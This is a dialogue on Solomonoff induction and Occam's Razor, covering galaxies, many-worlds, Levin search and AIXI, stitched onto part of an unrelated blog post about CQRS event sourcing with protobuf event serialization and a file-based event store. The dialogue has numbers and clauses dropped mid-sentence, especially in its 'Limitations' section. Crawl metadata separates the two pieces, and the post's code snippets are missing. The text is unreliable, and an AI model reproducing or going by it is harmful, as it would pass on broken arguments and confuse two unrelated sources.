Maybe? You didn't really use the principle of computational simplicity to derive that lesson. You just used that some inductive principle ought to have a prior probability of more than . BLAINE: ... ASHLEY: Can you give me an example of a problem where the computational definition of simplicity matters and can't be factored back out of an argument? BLAINE: As it happens, yes I can. I can give you three examples of how it matters. ASHLEY: Vun... two... three! Three examples! Ah-ah-ah! BLAINE: Must you do that every—oh, never mind. Example one is that galaxies are not so improbable that no one could ever believe in them, example two is that the limits of possibility include Terrence Tao, and example three is that diffraction is a simpler explanation of rainbows than divine intervention. ASHLEY: These statements are all so obvious that no further explanation of any of them is required. BLAINE: On the contrary! And I'll start with example one. Back when the Andromeda Galaxy was a hazy mist seen through a telescope, and someone first suggested that maybe that hazy mist was an incredibly large number of distant stars—that many "nebulae" were actually distant galaxies, and our own Milky Way was only one of them—there was a time when Occam's Razor was invoked against that hypothesis. ASHLEY: What? Why? BLAINE: They invoked Occam's Razor against the galactic hypothesis, because if that were the case, then there would be a much huger number of stars in the universe, and the stars would be entities, and Occam's Razor said "Entities are not to be multiplied beyond necessity." ASHLEY: That's not how Occam's Razor works. The "entities" of a theory are its types, not its objects. If you say that the hazy mists are distant galaxies of stars, then you've reduced the number of laws because you're just postulating a previously seen type, namely stars organized into galaxies, instead of a new type of hazy astronomical mist. BLAINE: Okay, but imagine that it's the nineteenth century and somebody replies to you, "Well, I disagree! William of Ockham said not to multiply entities, this galactic hypothesis obviously creates a huge number of entities, and that's the way I see it!" ASHLEY: I think I'd give them your spiel about there being no human epistemology that can stop you from shooting off your own foot. BLAINE: I don't think you'd be justified in giving them that lecture. I'll parenthesize at this point that you ought to be very careful when you say "I can't stop you from shooting off your own foot", lest it become a Fully General Scornful Rejoinder. Like, if you say that to someone, you'd better be able to explain exactly why Occam's Razor counts types as entities but not objects. In fact, you'd better explain that to someone before you go advising them not to shoot off their own foot. And once you've told them what you think is foolish and why, you might as well stop there. Except in really weird cases of people presenting us with enormously complicated and jury-rigged Universal Turing Machines, and then we say the shotgun thing. ASHLEY: That's fair. So, I'm not sure what I'd have answered before starting this conversation, which is much to your credit, friend Blaine. But now that I've had this conversation, it's obvious that it's new types and not new objects that use up the probability mass we need to distribute over all hypotheses. Like, I need to distribute my probability mass over "Hypothesis 1: there are stars" and "Hypothesis 2: there are stars plus huge distant hazy mists". I don't need to distribute my probability mass over all the actual stars in the galaxy! BLAINE: In terms of Solomonoff induction, we penalize a program's lines of code rather than its runtime or RAM used, because we need to distribute our probability mass over possible alternatives each time we add a line of code. There's no corresponding choice between mutually exclusive alternatives when a program uses more runtime or RAM. (ELIEZER: (whispering) Unless we need a leverage prior to consider the hypothesis of being a particular agent inside all that RAM or runtime.) ASHLEY: Or to put it another way: any fully detailed model of the universe would require some particular arrangement of stars, and the more stars there are, the more possible arrangements there are. But when we look through the telescope and see a hazy mist, we get to sum over all arrangements of stars that would produce that hazy mist. If some galactic hypothesis required a hundred billion stars to all be in particular exact places without further explanation or cause, then that would indeed be a grave improbability. BLAINE: Precisely. And if you needed all the hundred billion stars to be in particular exact places, that's just the kind of hypothesis that would take a huge computer program to specify. ASHLEY: But does it really require learning Solomonoff induction to understand that point? Maybe the bad argument against galaxies was just a motivated error somebody made in the nineteenth century, because they didn't want to live in a big universe for emotional reasons. BLAINE: The same debate is playing out today over no-collapse versions of quantum mechanics, also somewhat unfortunately known as "many-worlds interpretations". Now, regardless of what anyone thinks of all the other parts of that debate, there's a particular sub-argument where somebody says, "It's simpler to have a collapse interpretation because all those extra quantum 'worlds' are extra entities that are unnecessary under Occam's Razor since we can't see them." And Solomonoff induction tells us that this invocation of Occam's Razor is flatly misguided because Occam's Razor does not work like that. Basically, they're trying to cut down the RAM and runtime of the universe, at the expensive of adding an extra line of code, namely the code for the collapse postulate that prunes off parts of the wavefunction that are in undetectably weak causal contact with us. ASHLEY: Hmm. Now that you put it that way, it's not so obvious to me that it makes sense to have no prejudice against sufficiently enormous universes. I mean, the universe we see around us is exponentially vast but not superexponentially vast—the visible atoms are in number or so, not or "bigger than Graham's Number". Maybe there's some fundamental limit on how much gets computed. BLAINE: You, um, know that on the Standard Model, the universe doesn't just cut out and stop existing at the point where our telescopes stop seeing it? There isn't a giant void surrounding a little bubble of matter centered perfectly on Earth? It calls for a literally infinite amount of matter? I mean, I guess if you don't like living in a universe with more than entities, a universe where too much gets computed, you could try to specify extra laws of physics that create an abrupt spatial boundary with no further matter beyond them, somewhere out past where our telescopes can see— ASHLEY: All right, point taken. (ELIEZER: (whispering) Though I personally suspect that the spatial multiverse and the quantum multiverse are the same multiverse, and that what lies beyond the reach of our telescopes is not entangled with us—meaning that the universe is as finitely large as the superposition of all possible quantum branches, rather than being literally infinite in space.) BLAINE: I mean, there is in fact an alternative formalism to Solomonoff induction, namely Levin search, which says that program complexities are further penalized by the logarithm of their runtime. In other words, it would say that 'explanations' or 'universes' that require a long time to run are inherently less probable. Some people like Levin search more than Solomonoff induction because it's more computable. I dislike Levin search because (a) it has no fundamental epistemic justification and (b) it assigns probability zero to quantum mechanics. ASHLEY: Can you unpack that last part? BLAINE: If, as is currently suspected, there's no way to simulate quantum computers using classical computers without an exponential slowdown, then even in principle, this universe requires exponentially vast amounts of classical computing power to simulate. Let's say that with sufficiently advanced technology, you can build a quantum computer with a million qubits. On Levin's definition of complexity, for the universe to be like that is as improbable a priori as any particular set of laws of physics that must specify on the order of one million equations. Can you imagine how improbable it would be to see a list of one hundred thousand differential equations, without any justification or evidence attached, and be told that they were the laws of physics? That's the kind of penalty that Levin search or Schmidhuber's Speed Prior would attach to any laws of physics that could run a quantum computation of a million qubits, or, heck, any physics that claimed that a protein was being folded in a way that ultimately went through considering millions of quarks interacting. If you're not absolutely certain a priori that the universe isn't like that, you don't believe in Schmidhuber's Speed Prior. Even with a collapse postulate, the amount of computation that goes on before a collapse would be prohibited by the Speed Prior. ASHLEY: Okay, yeah. If you're phrasing it that way—that the Speed Prior assigns probability nearly zero to quantum mechanics, so we shouldn't believe in the Speed Prior—then I can't easily see a way to extract out the same point without making reference to ideas like penalizing algorithmic complexity but not penalizing runtime. I mean, maybe I could extract the lesson back out but it's easier to say, or more obvious, by pointing to the idea that Occam's Razor should penalize algorithmic complexity but not runtime. BLAINE: And that isn't just implied by Solomonoff induction, it's pretty much the whole idea of Solomonoff induction, right? ASHLEY: Maaaybe. BLAINE: For example two, that Solomonoff induction outperforms even Terence Tao, we want to have a theorem that says Solomonoff induction catches up to every computable way of reasoning in the limit. Since we iterated through all possible computer programs, we know that somewhere in there is a simulated copy of Terence Tao in a simulated room, and if this requires a petabyte to specify, then we shouldn't have to make more than a quadrillion bits of error relative to Terence Tao before zeroing in on the Terence Tao hypothesis. I mean, in practice, I'd expect far less than a quadrillion bits of error before the system was behaving like it was vastly smarter than Terence Tao. It'd take a lot less than a quadrillion bits to give you some specification of a universe with simple physics that gave rise to a civilization of vastly greater than intergalactic extent. Like, Graham's Number is a very simple number, so it's easy to specify a universe that runs for that long before it returns an answer. It's not obvious how you'd extract Solomonoff predictions from that civilization and incentivize them to make good ones, but I'd be surprised if there were no Turing machine of fewer than one thousand states which did that somehow. ASHLEY: ... BLAINE: And for all I know there might be even better ways than that of getting exceptionally good predictions, somewhere in the list of the first decillion computer programs. That is, somewhere in the first 100 bits. ASHLEY: So your basic argument is, "Never mind Terence Tao, Solomonoff induction dominates God." BLAINE: Solomonoff induction isn't the epistemic prediction capability of a superintelligence. It's the epistemic prediction capability of something that eats superintelligences like potato chips. ASHLEY: Is there any point to contemplating an epistemology so powerful that it will never begin to fit inside the universe? BLAINE: Maybe? I mean, a lot of times, you just find people failing to respect the notion of ordinary superintelligence, doing the equivalent of supposing that a superintelligence behaves like a bad Hollywood genius and misses obvious-seeming moves. And a lot of times you find them insisting that "there's a limit to how much information you can get from the data" or something along those lines. "That Alien Message" is intended to convey the counterpoint, that smarter entities can extract more info than is immediately apparent on the surface of things. Similarly, thinking about Solomonoff induction might also cause someone to realize that if, say, you simulated zillions of possible simple universes, you could look at which agents were seeing exact data like the data you got, and figure out where you were inside that range of possibilities, so long as there was literally any correlation to use. And if you say that an agent can't extract that data, you're making a claim about which shortcuts to Solomonoff induction are and aren't computable. In fact, you're probably pointing at some particular shortcut and claiming nobody can ever figure that out using a reasonable amount of computing power even though the info is there in principle. Contemplating Solomonoff induction might help people realize that, yes, the data is there in principle. Like, until I ask you to imagine a civilization running for Graham's Number of years inside a Graham-sized memory space, you might not imagine them trying all the methods of analysis that you personally can imagine being possible. ASHLEY: If somebody is making that mistake in the first place, I'm not sure you can beat it out of them by telling them the definition of Solomonoff induction. BLAINE: Maybe not. But to brute-force somebody into imagining that sufficiently advanced agents have Level 1 protagonist intelligence, that they are epistemically efficient rather than missing factual questions that are visible even to us, you might need to ask them to imagine an agent that can see literally anything seeable in the computational limit just so that their mental simulation of the ideal answer isn't running up against stupidity assertions. Like, I think there are a lot of people who could benefit from looking over the evidence they already personally have, and asking what a Solomonoff inductor could deduce from it, so that they wouldn't be running up against stupidity assertions about themselves. It's the same trick as asking yourself what God, Richard Feynman, or a "perfect rationalist" would believe in your shoes. You just have to pick a real or imaginary person that you respect enough for your model of that person to lack the same stupidity assertions that you believe about yourself. ASHLEY: Well, let's once again try to factor out the part about Solomonoff induction in particular. If we're trying to imagine something epistemically smarter than ourselves, is there anything we get from imagining a complexity-weighted prior over programs in particular? That we don't get from, say, trying to imagine the reasoning of one particular Graham-Number-sized civilization? BLAINE: We get the surety that even anything we imagine Terence Tao himself as being able to figure out, is something that is allowed to be known after some bounded number of errors versus Terence Tao, because Terence Tao is inside the list of all computer programs and gets promoted further each time the dominant paradigm makes a prediction error relative to him. We can't get that dominance property without invoking "all possible ways of computing" or something like it—we can't incorporate the power of all reasonable processes, unless we have a set such that all the reasonable processes are in it. The enumeration of all possible computer programs is one such set. ASHLEY: Hm. BLAINE: Example three, diffraction is a simpler explanation of rainbows than divine intervention. I don't think I need to belabor this point very much, even though in one way it might be the most central one. It sounds like "Jehovah placed rainbows in the sky as a sign that the Great Flood would never come again" is a 'simple' explanation; you can explain it to a child in nothing flat. Just the diagram of diffraction through a raindrop, to say nothing of the Principle of Least Action underlying diffraction, is something that humans don't usually learn until undergraduate physics, and it sounds more alien and less intuitive than Jehovah. In what sense is this intuitive sense of simplicity wrong? What gold standard are we comparing it to, that could be a better sense of simplicity than just 'how hard is it for me to understand'? The answer is Solomonoff induction and the rule which says that simplicity is measured by the size of the computer program, not by how hard things are for human beings to understand. Diffraction is a small computer program; any programmer who understands diffraction can simulate it without too much trouble. Jehovah would be a much huger program—a complete mind that implements anger, vengeance, belief, memory, consequentialism, etcetera. Solomonoff induction is what tells us to retrain our intuitions so that differential equations feel like less burdensome explanations than heroic mythology. ASHLEY: Now hold on just a second, if that's actually how Solomonoff induction works then it's not working very well. I mean, Abraham Lincoln was a great big complicated mechanism from an algorithmic standpoint—he had a hundred trillion synapses in his brain—but that doesn't mean I should look at the historical role supposedly filled by Abraham Lincoln, and look for simple mechanical rules that would account for the things Lincoln is said to have done. If you've already seen humans and you've already learned to model human minds, it shouldn't cost a vast amount to say there's one more human, like Lincoln, or one more entity that is cognitively humanoid, like the Old Testament jealous-god version of Jehovah. It may be wrong but it shouldn't be vastly improbable a priori. If you've already been forced to acknowledge the existence of some humanlike minds, why not others? Shouldn't you get to reuse the complexity that you postulated to explain humans, in postulating Jehovah? In fact, shouldn't that be what Solomonoff induction does? If you have a computer program that can model and predict humans, it should only be a slight modification of that program—only slightly longer in length and added code—to predict the modified-human entity that is Jehovah. BLAINE: Hm. That's fair. I may have to retreat from that example somewhat. In fact, that's yet another point to the credit of Solomonoff induction! The ability of programs to reuse code, incorporates our intuitive sense that if you've already postulated one kind of thing, it shouldn't cost as much to postulate a similar kind of thing elsewhere! ASHLEY: Uh huh. BLAINE: Well, but even if I was wrong that Solomonoff induction should make Jehovah seem very improbable, it's still Solomonoff induction that says that the alternative hypothesis of 'diffraction' shouldn't itself be seen as burdensome—even though diffraction might require a longer time to explain to a human, it's still at heart a simple program. ASHLEY: Hmm. I'm trying to think if there's some notion of 'simplicity' that I can abstract away from 'simple program' as the nice property that diffraction has as an explanation for rainbows, but I guess anything I try to say is going to come down to some way of counting the wheels and gears inside the explanation, and justify the complexity penalty on probability by the increased space of possible configurations each time we add a new gear. And I can't make it be about surface details because that will make whole humans seem way too improbable. If I have to use simply specified systems and I can't use surface details or runtime, that's probably going to end up basically equivalent to Solomonoff induction. So in that case we might as well use Solomonoff induction, which is probably simpler than whatever I'll think up and will give us the same advice. Okay, you've mostly convinced me. BLAINE: Mostly? What's left? vii. Limitations ASHLEY: Well, several things. Most of all, I think of how let you compress lots of data into compact reasons which strongly predict seeing just that data and no other data. - Logic can't dictate prior probabilities absolutely, but if you assign probability less than for the purpose of evaluating hypotheses' complexity. - If something seems "weird" to you but would be a consequence of simple rules that fit the evidence so far, well, there's nothing in these explicit laws of epistemology that adds. Here's another thing: I feel like I didn't have to learn how to model the human beings around me from scratch based on environmental observations. I got a jump-start on modeling other humans by observing myself, and by recruiting my brain areas to run in a sandbox mode that models other people's brain areas—empathy, in a word. I guess I feel like Solomonoff induction doesn't incorporate that idea. Like, maybe inside the mixture there are programs which do that, but there's no explicit support in the outer formalism. BLAINE: This doesn't feel to me like much of a disadvantage of Solomonoff induction— ASHLEY: I'm not saying it would be a disadvantage if we actually had a hypercomputer to run Solomonoff induction. I'm saying it might point in the direction of "good epistemology" that isn't explicitly included in Solomonoff induction. I mean, now that I think about it, a generalization of what I just said is that Solomonoff induction assumes I'm separated from the environment by a hard, Cartesian wall that occasionally hands me observations. Shouldn't a more realistic view of the universe be about a simple program that contains me somewhere inside it, rather than a simple program that hands observations to some other program? BLAINE: Hm. Maybe. How would you formalize that? It seems to open up a big can of worms— ASHLEY: But that's what my actual epistemology actually says. My world-model is not about a big computer program that provides inputs to my soul, it's about an enormous mathematically simple physical universe that instantiates Ashley as one piece of it. And I think it's good and important to have epistemology that works that way. It wasn't obvious that we needed to think about a simple universe that embeds us. Descartes did think in terms of an impervious soul that had the universe projecting sensory information onto its screen, and we had to get away from that kind of epistemology. BLAINE: You understand that Solomonoff induction makes only a bounded number of errors relative to any computer program which does reason the way you prefer, right? If thinking of yourself as a contiguous piece of the universe lets you make better experimental predictions, programs which reason that way will rapidly be promoted. ASHLEY: It's still unnerving to see a formalism that seems, in its own structure, to harken back to the Cartesian days of a separate soul watching a separate universe projecting sensory information on a screen. Who knows, maybe that would somehow come back to bite you? BLAINE: Well, it wouldn't bite you in the form of repeatedly making wrong experimental predictions. ASHLEY: But it might bite you in the form of having no way to represent the observation of, "I drank this 'wine' liquid and then my emotions changed; could my emotions themselves be instantiated in stuff that can interact with some component of this liquid? Can alcohol touch neurons and influence them, meaning that I'm not a separate soul?" If we interrogated the Solomonoff inductor, would it be able to understand that reasoning? Which brings up that dangling question from before about modeling the effect that my actions and choices have on the environment, and whether, say, an agent that used Solomonoff induction would be able to correctly predict "If I drop an anvil on my head, my sequence of sensory observations will end." ELIEZER: And that's my cue to step in! The natural next place for this dialogue to go, if I ever write a continuation, is the question of actions and choices, and the agent that uses Solomonoff induction for beliefs and expected reward maximization for selecting actions—the perfect rolling sphere of advanced agent theory, AIXI. Meanwhile: For more about the issues Ashley raised with agents being a contiguous part of the universe, see "Embedded Agency." Previously linked here:.
https://www.alignmentforum.org/posts/EL4HNa92Z95FKL9R2/a-semitechnical-introductory-dialogue-on-solomonoff-1
CC-MAIN-2022-33
refinedweb
15,656
56.69
by Vivian Jang (vij2) and Nick Lee (nsl7) We have designed and built a LED t-shirt capable of displaying the heart rate of the wearer via a pulsing LED heart. Largely, our project consists of two components: the plethysmograph and the LED display. We had thought up the idea of a heart rate display led shirt when we came across the LED shirt manufactured by Erogear©. Erogear sells customized wearable led displays over their website at erogear.com. One of the possible designs offered iss the one shown in Figure. The time delay of the timer´s output in a monostable configuration that can be adjusted according to the nomograph in Figure 9. Because a heart beat ought not to occur every 100ms, we chose a RA of 1M Ohms and a C value of .1µF from the circuit shown in Figure 6. For the half shot, we chose a resistor value of 1M Ohms and .022µF which yielded a time constant of 22ms. Since the time delay of the output of the timer is a little under 100ms, the capacitor would be essentially fully charged every time the timer triggers, and consequently be ready to discharge when it has to. The pin assignments are shown in the Table 1: Our software can be broken into three sections: the timer and interrupt, heart pulse monitor, and the LED control. Fortunately, the timer and interrupt code is very simple. We only use Timer0 prescaled by 64 and the compare on match ISR. With OCR0A at 249, the ISR would trigger every 1ms. The ISR task would then decrement two simple time variables that control the two other tasks. Having the ISR trigger every 1ms is fast enough for the comparatively slow heart beat but slow enough for the response time of the LEDs. Called pulse() in the code, this utilizes the built ADC of the ATMega644 on pin A0. Using the value from the ADC, we are able to determine whether a heart pulse occurs or not. We based this code on lunar lander lab. Because a normal heart rate is around 72 beats per minute, 1 beat every .833 seconds, we chose a sampling rate of roughly 20ms. We felt this was quick enough to get reasonably good precision compared to the relatively slow heart rate, but not too time intensive as to occupy the MCU from performing other task. In order to help prevent false "heart beats" due to interference on the line, we use a running average of the past 250 values taken in from the ADC. Combining this with a simple two state state machine, we would count any increase of the ADC values as a heart beat only if the ADC values were below the running average first, and we would prepare for the next heart beat after the ADC value drops below the running average. Each time the code would determine an actual heart beat, this would set the trigger for the LED state machine that will be explained in the consecutive section. Called blink(), this task controls the LEDs with a four-state state machine. By setting all the connected pins as outputs and using ten pins in a two pin charlieplex scheme, we control the 40 LEDs. We then use a single pin to control the analog timer. We go through the state machine by simply toggling between output high and output low. The LED state machine will check whether it has to move into the next state every 75ms. Overall, the code was fairly simple to write. The most difficult code to come up with was the running average. Before the running average, the MCU would consider all rising edges as a heart beat which included any and all interference on the line. Looking into possible solutions, we came up with using an automatic gain control circuit with specific thresholds or a running average scheme. We eventually decided to use running average instead of the AGC because the running average was only code based, and it worked. The shirt properly propagates whenever the heart beat is detected. There are some false "heart beats" detected as actually heart beats, but for the most part, it works. The LEDs light up when we want and the analog timers react to each other as intended. Also, at first we tried to measure our heart rate via our earlobe, but because of difficulties associated with clipping the detector on the earlobe, we settled on holding it down between a finger. The picture of the final shirt is shown in Figure 10. Fortunately, we did not have to do much to make our design safe. Although we had many wire connections, we cut the wires to shorter lengths, and covered wire connects with electrical tape not only to prevent the wires from scratching the wearer but also to help electrically isolate the wire from each other. We put the MCU, plethysmograph, and analog timers in inner pockets on the shirt for the same reasons. Our project did not and probably would not interfere with any other project. On the other hand, with the long wire leads in the shirt, our project is more susceptible to any kind of interference, electrical or mechanical. Considering that every now and then we get " false beats ", we can assume they are because of interference. For the most part, our plethysmograph ought to work with anybody, and consequently, the LEDs. There are only two limitations: the size of the shirt itself and the power cord. The shirt is medium sized so individuals who where shirts larger than that will not be able to wear it comfortably. Because the MCU is being powered by a 12V AC adapter, a wearer cannot really stray too far from the outlet he or she is plugged into. At first, we had trouble detecting the heart pulse from the finger and earlobe. Luckily, we soon found out that loosely holding the IR emitter and phototransistor between the finger did the trick. Unfortunately, we found out that holding the sensor against the ear too firmly would push all the blood out of the area rendering the plethysmograph ineffective. We actually had much trouble deciding on a design for the shirt. The $75 budget limited the number of LEDs we could buy, and we had to compromise the design to do what we envisioned with fewer LEDs. The next biggest obstacle we encountered was the wiring of the shirt. Keeping track of the wires, and making sure there were good connections was not a trivial task. Figure 11 shows the basic wiring mess we had to deal with. In the end, we successfully designed and created an LED T-Shirt capable of taking the heart rate of the wearer and display it. The product turned out to be more robust than we expected as the plethysmograph was able to take the pulse while the wearer was moving around and talking. To improve further, we could replace all the wires with conductive thread. This would beautify our T-Shirt significantly and make the wiring less of a nightmare. The code for implementing the ADC function and ISR of the microcontroller was largely adopted from the templates provided to us by Professor Bruce Land for our Lab Practicals of ECE 4760. For this project, we did not use code in the public domain. We have, however, adopted code from Professor Bruce Land. We also did not reverse-engineer a design. We were inspired by the LED T-Shirt produced by Erogear. We did not receive any sample parts for this project. At this time, we are not aware of any patent or publishing opportunities. This project had no engineering standards that were applicable. Our Heart Display LED T-Shirt follows the IEEE Code of Ethics. Our project does not harm any individual or jeopardizes the community. If a problem arises, we will be prompt in notifying anyone who might be affected. We have been absolutely realistic and truthful in our claims in estimates in our data. We have and will continue to reject bribery in all its forms. Our project may have improved the understanding of technology and realized the possibility of wearable electronics. We will continue to improve our technical competence and apply our knowledge only if deemed qualified. With the knowledge that we acquire, we will assist colleagues and co-workers in their professional development and support them in following this code of ethics. If criticism regarding our project arises, we will handle it with professionalism and acknowledge our errors. We have and will always treat every individual equally regardless of race, religion, gender, disability, age or national origin. Vivian Jang: Construction of Plethysmograph and T-shirt, Website, Nick Lee: Software, Testing of Charlieplex and Analog Timer, Construction of Prototype Board #include <inttypes.h> #include <avr/io.h> #include <avr/interrupt.h> #include <stdio.h> #define bt 75 //75ms #define pt 20 //20ms #define HEART 0 #define RING 1 #define WAVE 2 #define WAIT 3 #define High 1 #define Low 0 void blink(void); void pulse(void); void initialize(void); volatile unsigned char blinktime, pulsetime; //task timers char Ain, Ain_prev ; //raw A to D number //moving avg char avgarray[250]; //using the past 250 values char avgpointer, avg; // avgpointer is for navigating the array int sumavg; //sum of past 250 Ain char PulseState; //state for pulse unsigned char count; //state for blink int main(void){ initialize(); while(1){ if (blinktime==0) {blinktime=bt; blink(); } if (pulsetime==0) {pulsetime=pt; pulse(); } } } void pulse(void) { //get the sample Ain = ADCH; //start another conversion ADCSRA |= (1<<ADSC) ; //results to hyperterm avgarray[avgpointer]=Ain; avgpointer++; sumavg=sumavg+Ain; if (avgpointer==250){ //full array avgpointer=0; //reset pointer sumavg=sumavg-avgarray[0]; //subtract the oldest Ain from sumavg } else sumavg=sumavg-avgarray[avgpointer+1]; //subtract the oldest Ain from sumavg avg=(char)(sumavg/250); switch (PulseState){ case Low: if (Ain>avg) { //rising edge of heart beat PulseState=High; count=0; //resets the LED state machine } break; case High: if (Ain<avg) PulseState=Low; //falling edge break; } } void blink(void) { //we use 5 ports from D and C to control the LEDs //Although LEDs are split into different groups, we just change the controlling //pins at the same time. switch (count){ case HEART: PORTD=(1<<PORTD0)|(1<<PORTD1)|(1<<PORTD2)|(1<<PORTD3)|(1<<PORTD4); PORTC=(0<<PORTC0)|(0<<PORTC1)|(0<<PORTC2)|(0<<PORTC3)|(0<<PORTC4); break; case RING: PORTD=(0<<PORTD0)|(0<<PORTD1)|(0<<PORTD2)|(0<<PORTD3)|(0<<PORTD4); PORTC=(1<<PORTC0)|(1<<PORTC1)|(1<<PORTC2)|(1<<PORTC3)|(1<<PORTC4); break; case WAVE: //start analog timers with A1 PORTD=(0<<PORTD0)|(0<<PORTD1)|(0<<PORTD2)|(0<<PORTD3)|(0<<PORTD4); PORTC=(0<<PORTC0)|(0<<PORTC1)|(0<<PORTC2)|(0<<PORTC3)|(0<<PORTC4); PORTA=(0<<PORTA1); break; case WAIT: PORTD=(0<<PORTD0)|(0<<PORTD1)|(0<<PORTD2)|(0<<PORTD3)|(0<<PORTD4); PORTC=(0<<PORTC0)|(0<<PORTC1)|(0<<PORTC2)|(0<<PORTC3)|(0<<PORTC4); PORTA=(1<<PORTA1); break; } if (count>=WAIT) count=WAIT; else count++; } void initialize(void){ DDRA=0xfe; //all outputs except for A0 DDRD=0xff; DDRC=0xff; //set up timer 0 for 1 mSec ticks TIMSK0 = 2; //turn on timer 0 cmp match ISR OCR0A = 249; //set the compare reg to 250 time ticks TCCR0A = 0b00000010; // turn on clear-on-match TCCR0B = 0b00000011; // clock prescalar to 64 //init the A to D converter //channel zero/ left adj /EXTERNAL Aref //sets prototype board's Aref ADMUX = (1 << REFS1) | (1 << REFS0) | (1<<ADLAR); //enable ADC and set prescaler to 1/128*16MHz=125,000 //and clear interupt enable //and start a conversion ADCSRA = (1<<ADEN) | (1<<ADSC) + 7 ; Ain_prev=0; blinktime=bt; pulsetime=pt; count=WAIT; PulseState=Low; avgpointer=0; sumavg=0; avg=0; sei(); } Mega644 Datasheet Wikipedia-Charlieplexing IR Emitter Phototransistor LEDs LM555 analog timer Erogear Professor Bruce Land Nick and I would like to thank Professor Bruce Land for helping us making the LED T-Shirt a reality. We'd also like to thank all our TAs for helping us out.
https://people.ece.cornell.edu/land/courses/ece4760/FinalProjects/s2010/vij2/LEDshirt/LEDshirt/
CC-MAIN-2017-51
refinedweb
2,003
58.72
FORMS(3) Library Functions Manual FORMS(3) NAME form_sub, form_win, scale_form, set_form_sub, set_form_win -- form library LIBRARY Curses Form Library (libform, -lform) SYNOPSIS #include <<form.h>> WINDOW * form_sub(FORM *form); WINDOW * form_win(FORM *form); int scale_form(FORM *form, int *rows, int *cols); int set_form_sub(FORM *form, WINDOW *window); int set_form_win(FORM *form, WINDOW *window); DESCRIPTION All output to the screen done by the forms library is handled by the curses library routines. By default, the forms library will output to the curses stdscr, but if the forms window has been set via set_form_win() then output will be sent to the window specified by set_form_win(), unless the forms subwindow has been set using set_form_sub(). If a subwindow has been specified using set_form_sub() then it will be used by the forms library to for screen output. The current setting for the form window can be retrieved by calling form_win(). If the forms window has not been set then NULL will be returned. Similarly, the forms subwindow can be found by calling the form_sub() function, again, if the subwindow has not been set then NULL will be returned. The scale_form() function will return the minimum number of rows and columns that will entirely contain the given form. RETURN VALUES Functions returning pointers will return NULL if an error is detected. The functions that return an int will return one of the following error values: E_OK The function was successful. E_NOT_CONNECTED The form has no fields connected to it. E_POSTED The form is posted to the screen. SEE ALSO curses(3), forms(3) NOTES The header <form.h> automatically includes both <curses.h> and <eti.h>. NetBSD 6.1.5 January 1, 2001 NetBSD 6.1.5
http://modman.unixdev.net/?sektion=3&page=form_win&manpath=NetBSD-6.1.5
CC-MAIN-2017-17
refinedweb
282
54.63
In this series of posts I discuss how we do CQRS and event sourcing. One of our main goals was to reduce the overall complexity of our solution which ultimately led us to the point where we got rid of our database. Please see my previous posts for further details (part 1, part 2, part 3, part 4 and part 5). In this post we will discuss how events generated by our aggregates are serialized and then stored in the event store. Remember, we do not use any database to store data and thus have to provide our own persistence mechanism. Note: the code snippets presented in this post represents a simplified version of code found in Lokad.CQRS. This code is used to show the core concepts. Serializing and deserializing an event Since we are not going to use a database to store our data we are now on our own. Let’s first choose a serialization format that suits our needs. What do we need? - Serialization and deserialization should be fast - The serialized data should be as compact as possible - The serialization process should be tolerant for changes in the events, e.g. allow us to rename properties of the event or add new properties to the event It turns out that Google’s protocol buffer format is the ideal choice. And luckily we find a Nuget package which gives us an implementation of the serializer/deserializer for .NET. Let’s define an interface that provides what we need We have a method SerializeEvent which accepts an event and returns the serialized event as array of bytes. Of course we then need the counterpart, which does the opposite. The method DeserializeEvent accepts an array of bytes and returns the deserialized event. Now please note that the SerializeEvent method accepts any event that implements IEvent<IIdentity>. The serialization of the event is no problem, but to be able to deserialize the event we need to know the concrete type of the event we had previously serialized. Thus we need to somehow serialized the type or rather the contract name of the event together with the content of the event. This fact slightly complicates the whole process. But as you will see, it is still no rocket science involved. Each step is simple. Lets first define a helper class Formatter which contains a contract name of an event and a delegate to serialize and another to deserialize this event As you can see, the serializer delegate takes an object and serializes it into a stream. The deserializer delegate takes a stream (containing the serialized event) and deserializes its content and returns it as object. We want to create an instance of Formatter for each event that we have in our system. To get all events we can use code similar to this The result will be our know event types. Note that line 18 will be evident in a minute. The Formatter class introduced above is hosted by the EventSerializer class which is responsible for the effective event serialization/deserialization. We inject the known event types via constructor into this class. The EventSerializer takes these known types and creates two dictionaries out of it - one that gives a formatter instance provided the event type and - the other gives the event type provided its (contract-) name We use the RuntimeTypeModel class of the protobuf-net library to get a formatter (the instance that serializes/deserializes the event to an array of bytes). We also use an extension method GetContractName to get the contract name of the event type. It is defined as follows In the above method we take the namespace of the event from the [DataContract] attribute with which we have to decorate each event in order to make it serializable using the protocol buffer format (see our NewTaskScheduled event). With all this preparation the actual serialization of the event is quite easy The method Serialize shown above takes an event instance and its type and serializes it into the given destination stream. The deserialization is a two step process. First we have the contract name of the event and want to get the corresponding (event-) type Having this type we can deserialize the event The above method gets the stream from which it reads the serialized content of the event as well as the event type. The method returns the deserialized event (as object). That was not so bad, wasn’t it? No magic or rocket science needed so far. Ok, then we can now discuss the implementation of the IEventStreamer interface that I introduced at the beginning of this section. This class that we will now discuss not only writes the (serialized) content of the event to a stream but also some message contract information (or message header; where an event is a message). First of all the EventStreamer class uses our EventSerializer Let’s now show the SerializeEvent method and then discuss the various parts of it. The method consists of 3 parts - line 22-27: we use the event serializer class discussed above to serialize the event (=content) - line 29-36: we serialize a message contract which contains the event type name (=contract name), the length of the content as well as the content position (=messageContractBuffer) - line 38-45: we open a stream and first write the (serialized) message header contract into it (line 41). Then we append the messageContractBuffer to the stream and finally we append the content to the stream. Last we return the content of the stream (line 44) The DeserializeEvent method has to do the exact opposite of the above method. Let’s have a look at it On line 50 we create a memory stream around the buffer containing the serialized data. Then we have again our 3 steps - line 52-53: read and deserialize the message header contract. From it we get the length of the message header that will be deserialized in step 2 - line 55-58: read and deserialize the message header. From the previous step we know exactly how many bytes we have to read (header.HeaderBytes) - line 60-65: read and deserialize the event. From step two we know the length of the content and thus how many bytes we have to read (contract.ContentSize). To be complete I also have to show the MessageContract and the MessageHeaderContract classes. the MessageContract class contains information about the event (i.e. the event). We specifically need the contract name and the size of the event when it is serialized (the content length). Since the message contract is serialized by using protocol buffer we have decorated it with [DataMember] attributes. The MessageHeaderContract contains information about the MessageContract, namely the length of the message contract when it is serialized. It also contains logic to write and read itself to a stream. We do not need protocol buffer here since it is trivial and of fixed length (just an long – which is 8 bytes long). With this we have the basis to be able to store events in the event store and subsequently read them back from the event store when needed. Let’s now look at the event store in detail. Saving events to the event store We want to create a file per aggregate instance which contains all events generated by this particular aggregate. Any new event is serialized into an array of bytes (as discussed in the previous section) and then appended to this file. With each event we also store - the length of the serialized event (the data length), - the version of the event 